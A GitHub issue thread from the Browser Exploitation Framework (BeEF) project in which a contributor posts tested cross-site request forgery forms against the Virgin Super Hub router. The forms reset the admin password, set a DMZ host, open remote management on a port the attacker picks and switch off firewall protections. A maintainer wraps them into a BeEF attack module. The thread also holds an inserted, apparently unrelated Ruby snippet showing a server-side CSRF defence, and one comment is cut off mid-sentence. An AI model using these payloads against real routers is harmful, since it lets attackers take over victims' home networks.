beefproject / beef

The Browser Exploitation Framework Project
https://beefproject.com

CSRF Virgin Superhub (UK) #703

Closed n0x00 closed 12 years ago

n0x00 commented 12 years ago

I had tested this at home, it works.

It will only work when the admin is logged in, but if you could redirect web pages to the router perhaps he'll log in just to see WTF. Can't seem to post HTML in here, pre isn't working?! Anyone help? I'll post the code.

<html>
<body>
<form action="http://192.168.100.1/goform/RgSecurity" method="POST">
<input type="hidden" name="NetgearPassword" value="p3nt35t" />
<input type="hidden" name="NetgearPasswordReEnter" value="p3nt35t" />
<input type="hidden" name="RestoreFactoryNo" value="0x00" />
<input type="submit" value="Submit form" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

bcoles commented 12 years ago

Thanks for this.

I've added a module for this in commit 771d6d60f9cb077c62e6d163e3ac7e1a8c89576f. Are you able to confirm it works?

You can use 3x backticks (```) to start and end code sections.

Like this

n0x00 commented 12 years ago

Sweet, I am sure, but just because you asked and it's been about 6 weeks since I played with it, I'll double-check tonight :)

I'm not sure how I would incorporate it into BeEF. I'm new to Git and imagine there are people more fluent at coding than me.

three backticks! got it :)

bcoles commented 12 years ago

It's already incorporated into BeEF :)

I'm closing this issue. Please let me know if the BeEF module works.

n0x00 commented 12 years ago

Hah, wicked! Here I was making a screeny for you, I'll test it now!

PoC - http://thegentlemanhackersclub.com/verdhehoes_cha_cha_cha/SuperHubCSRF/SuperHub-CSRF.html

n0x00 commented 12 years ago

Hey, it doesn't want to work with that module mate... I had tried it a few times and then ran the HTML created to replicate it. I'll paste it in here. This one has a submit value that the other doesn't; perhaps that's my fault, but the code below works 100% every time as of this morning (recreating the attack).

<html>
  <body>
    <form action="http://192.168.100.1/goform/RgSecurity" method="POST">
      <input type="hidden" name="NetgearPassword" value="sneaky" />
      <input type="hidden" name="NetgearPasswordReEnter" value="sneaky" />
      <input type="hidden" name="RestoreFactoryNo" value="0x00" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
bcoles commented 12 years ago

Thanks for testing.

Were you logged in to the router?

The submit tag shouldn't make a difference.

The default IP address for the module is http://192.168.1.254/ - which is probably the problem. This has now been fixed. Did you change it to http://192.168.100.1/ when you were testing?

The request used by the BeEF module is exactly the same as the request used in your video, with one exception: it contains two "/" characters, which might also be the issue, i.e. http://192.168.100.1//goform/RgSecurity

Try submitting the IP address without the trailing slash, i.e.: http://192.168.100.1

n0x00 commented 12 years ago

I did change the address, yes. I'm sure I was logged in (I didn't have it going through Burp but will do until we get this).

I also tried appending .asp to RgSecurity (RgSecurity.asp) to see if that worked, but I'll have a tinker.

I just locked myself out of it, hah :/ I'll keep you posted.

Cool.

n0x00 commented 12 years ago

I removed the trailing slash and it works :)

n0x00 commented 12 years ago

Another note: this whole device is vulnerable to CSRF. I just figured this would be the most used / wanted feature. Cool!
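
The forms in this thread work because the Super Hub's goform handlers accept any POST that arrives with the admin's session cookie. The following is an added example (not BeEF's code and not Netgear firmware) of the server-side check that would have stopped them: a same-origin check on Origin/Referer plus a session-bound synchronizer token. The router address, the attacker.example host, the csrf_token field and the RgSecurity.asp referer are assumptions for the constructed requests.

```ruby
require 'uri'

# Assumed LAN address of the router, taken from the thread.
ROUTER_ORIGIN = "http://192.168.100.1".freeze

# Constant-time comparison so the token check does not leak via timing.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Models the check a /goform/RgSecurity handler needs. headers is the request
# header Hash, params the decoded POST body, expected_token the token the
# router stored in the admin's session when it served the settings page.
# Returns [allowed, reason].
def allow_goform_post?(headers, params, expected_token)
  # 1. Browsers send Origin on cross-site form POSTs (Referer on older ones);
  #    either must match the router's own origin or the request is refused.
  source = headers["Origin"] || headers["Referer"]
  return [false, "missing Origin/Referer"] if source.nil? || source.empty?
  src = URI.parse(source) rescue nil
  ref = URI.parse(ROUTER_ORIGIN)
  unless src && src.scheme == ref.scheme && src.host == ref.host && src.port == ref.port
    return [false, "cross-site origin #{source}"]
  end
  # 2. A hidden input on a third-party page cannot know the per-session token,
  #    so the posted forms above fail here even if they spoof the origin.
  token = params["csrf_token"].to_s
  return [false, "bad csrf token"] unless secure_compare(token, expected_token)
  [true, "ok"]
end

# Constructed requests: the auto-submitted form from an attacker-controlled
# page, and a legitimate submission from the router's own settings page.
CSRF_REQUEST  = { "Origin"  => "http://attacker.example",
                  "Referer" => "http://attacker.example/SuperHub-CSRF.html" }
CSRF_PARAMS   = { "NetgearPassword" => "sneaky", "NetgearPasswordReEnter" => "sneaky",
                  "RestoreFactoryNo" => "0x00" }
LEGIT_REQUEST = { "Origin" => ROUTER_ORIGIN, "Referer" => "#{ROUTER_ORIGIN}/RgSecurity.asp" }
LEGIT_PARAMS  = CSRF_PARAMS.merge("csrf_token" => "t0k3n-from-session")

if __FILE__ == $0
  p allow_goform_post?(CSRF_REQUEST, CSRF_PARAMS, "t0k3n-from-session")   # rejected
  p allow_goform_post?(LEGIT_REQUEST, LEGIT_PARAMS, "t0k3n-from-session") # allowed
end
```

A request with no Origin and no Referer is refused as well, since a header-stripping proxy must not turn into a bypass.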

bcoles commented 12 years ago

Sweet. Thanks for testing.

I've fixed the issue with the duplicate slash /

For BeEF router CSRF modules we generally stick to payloads which:

n0x00 commented 12 years ago

I'll have a crack at them tonight!

n0x00 commented 12 years ago

To DMZ a host: you see the value '3' is the last octet of the class C (IP).

<html>
  <body>
    <form action="http://192.168.100.1/goform/RgDmzHost" method="POST">
      <input type="hidden" name="cbNetgearWanBlocking" value="0x10" />
      <input type="hidden" name="DmzHostIP3" value="3" />
      <input type="hidden" name="NetgearMtuSize" value="0" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

-Tested :)

n0x00 commented 12 years ago

Enable Remote Management - port 8080 - change the value 8080 to your own port.

<html>
  <body>
    <form action="http://192.168.100.1/goform/RgVMRemoteManagementRes" method="POST">
      <input type="hidden" name="NetgearVMRmEnable" value="0x01" />
      <input type="hidden" name="NetgearVMRmPortNumber" value="8080" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
n0x00 commented 12 years ago

Disable all Firewalls and Filtering services

Firewall Features:
Ipsec PassThrough
PPTP PassThrough
Multicast
Port Scan Detection
IP Flood Detection

Web Features:
Filter Proxy
Filter Cookies
Filter Java Applet
Filter ActiveX
Filter Popup Windows
Block Fragmented IP Packets

Sweet.

<html>
  <body>
    <form action="http://192.168.100.1/goform/RgServices" method="POST">
      <input type="hidden" name="cbPortScanDetection" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

-Tested :)